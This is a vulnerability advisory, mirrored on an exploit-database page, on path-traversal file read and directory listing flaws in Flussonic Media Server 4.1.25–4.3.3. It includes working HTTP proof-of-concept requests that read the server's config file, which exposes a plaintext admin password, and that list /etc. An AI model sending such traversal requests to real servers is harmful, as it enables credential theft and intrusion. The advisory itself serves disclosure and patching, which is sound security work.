Search for hundreds of thousands of exploits

"Flussonic Media Server 4.1.25 < 4.3.3 - Arbitrary File Disclosure"

Author

Exploit author

"BGA Security"

Platform

Exploit platform

aix

Release date

Exploit published date

2014-07-01

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
Document Title:
============
Flussonic Media Server 4.3.3 Multiple Vulnerabilities

Release Date:
===========
June 29, 2014

Product & Service Introduction:
========================
Flussonic is a mutli-protocol streaming server with support for many protocols, including HDS, HLS, RTMP, RTSP, HTTP, MPEG-TS. Flussonic has the capability of capturing multimedia from external sources, such as video cameras, satellite TV and other multimedia servers (Wowza, Flash Media Server and Red5).

Flussonic operates on the highly flexible and fast Erlang platform that facilitates impressive performance during parallel data processing, failure safety for servers, and scaling options up to a sophisticated distributed data network.

Abstract Advisory Information:
=======================
BGA Security Team discovered an arbitrary file read and arbitrary directory listing vulnerability in Flussonic Media Server 4.3.3

Vulnerability Disclosure Timeline:
=========================
June 26, 2014    :    Contact with Vendor
June 26, 2014    :    Vendor Response
June 26, 2014    :    Version 4.3.4 Deployed
June 29, 2014    :    Public Disclosure

Discovery Status:
=============
Published

Affected Product(s):
===============
Erlyvideo, LLC
Product: Flussonic Media Server 4.1.25 - 4.3.3 

Exploitation Technique:
==================
AFR:    Remote, Unauthenticated
ADL:    Remote, Authenticated

Severity Level:
===========
High

Technical Details & Description:
========================
1. Arbitrary File Read (Unauthenticated)
It’s possible to read any files from the server (with the application’s user’s permissions) by a simple HTTP GET request. Flussonic’s web interface login information can be found as plaintext by reading /etc/flussonic/flussonic.conf; thus, it’s possible to login any Flussonic web interface using that method.

2. Arbitrary Directory Listing (Authenticated)
It’s possible to list any directories’ content sending a HTTP GET request to β€œflussonic/api/list_files” with the parameter β€œsubpath=directory”. 


Proof of Concept (PoC):
==================
Proof of Concept AFR Request & Response:

GET /../../../etc/flussonic/flussonic.conf HTTP/1.1
Host: 6.6.6.100:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

HTTP/1.1 200 OK
Connection: keep-alive
Server: Cowboy
Date: Thu, 26 Jun 2014 09:50:57 GMT
Content-Length: 191
Content-Type: text/plain
Last-Modified: Tue, 24 Jun 2014 22:10:53 GMT
Etag: 1452b98181c562b2e2d041a3e1fe2af0cffe8687

# Default ports Flussonic M1 Media server listens on
http 80;
http 8080;
rtmp 1935;
rtsp 554;
pulsedb /var/run/flussonic;
edit_auth flussonic letmein!;

live mylive;

file vod {
path priv;
}

2. Proof of Concept ADR Request & Response:

GET /flussonic/api/list_files?subpath=../../../etc HTTP/1.1
Host: 6.6.6.100:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic Zmx1c3NvbmljOmxldG1laW4h
Connection: keep-alive

HTTP/1.1 200 OK
Connection: keep-alive
Server: Cowboy
Date: Thu, 26 Jun 2014 11:04:12 GMT
Content-Length: 7555
X-Route-Time: 28
X-Run-Time: 8090
Content-Type: application/json

{β€œfiles":[{"name":"X11","type":"directory"},{"name":"acpi","type":"directory"},{"name":"adduser.conf","type":"file","prefix":"vod"},{"name":"alternatives","type":"directory"},{"name":"apache2","type":"directory"},{"name":"apm","type":"directory"},
………
{β€œname":"xml","type":"directory"},{"name":"zsh_command_not_found","type":"file","prefix":"vod"}]}


Solution Fix & Patch:
================
Update version 4.3.4

Security Risk:
==========
The risk of the vulnerabilities above estimated as high and medium.

Credits & Authors:
==============
Bilgi GΓΌvenliΓ°i Akademisi

Disclaimer & Information:
===================
The information provided in this advisory is provided as it is without any warranty. BGA disclaims all  warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.
            
Domain:        http://bga.com.tr/advisories.html
Social:           http://twitter.com/bgasecurity
Contact:        bilgi@bga.com.tr
    
Copyright Β© 2014 | BGA
Release DateTitleTypePlatformAuthor
2015-03-12"Citrix Netscaler NS10.5 - WAF Bypass (Via HTTP Header Pollution)"webappsxml"BGA Security"
2014-11-17"Proticaret E-Commerce Script 3.0 - SQL Injection (2)"webappsxml"BGA Security"
2014-07-01"Flussonic Media Server 4.1.25 < 4.3.3 - Arbitrary File Disclosure"dosaix"BGA Security"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/33943/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.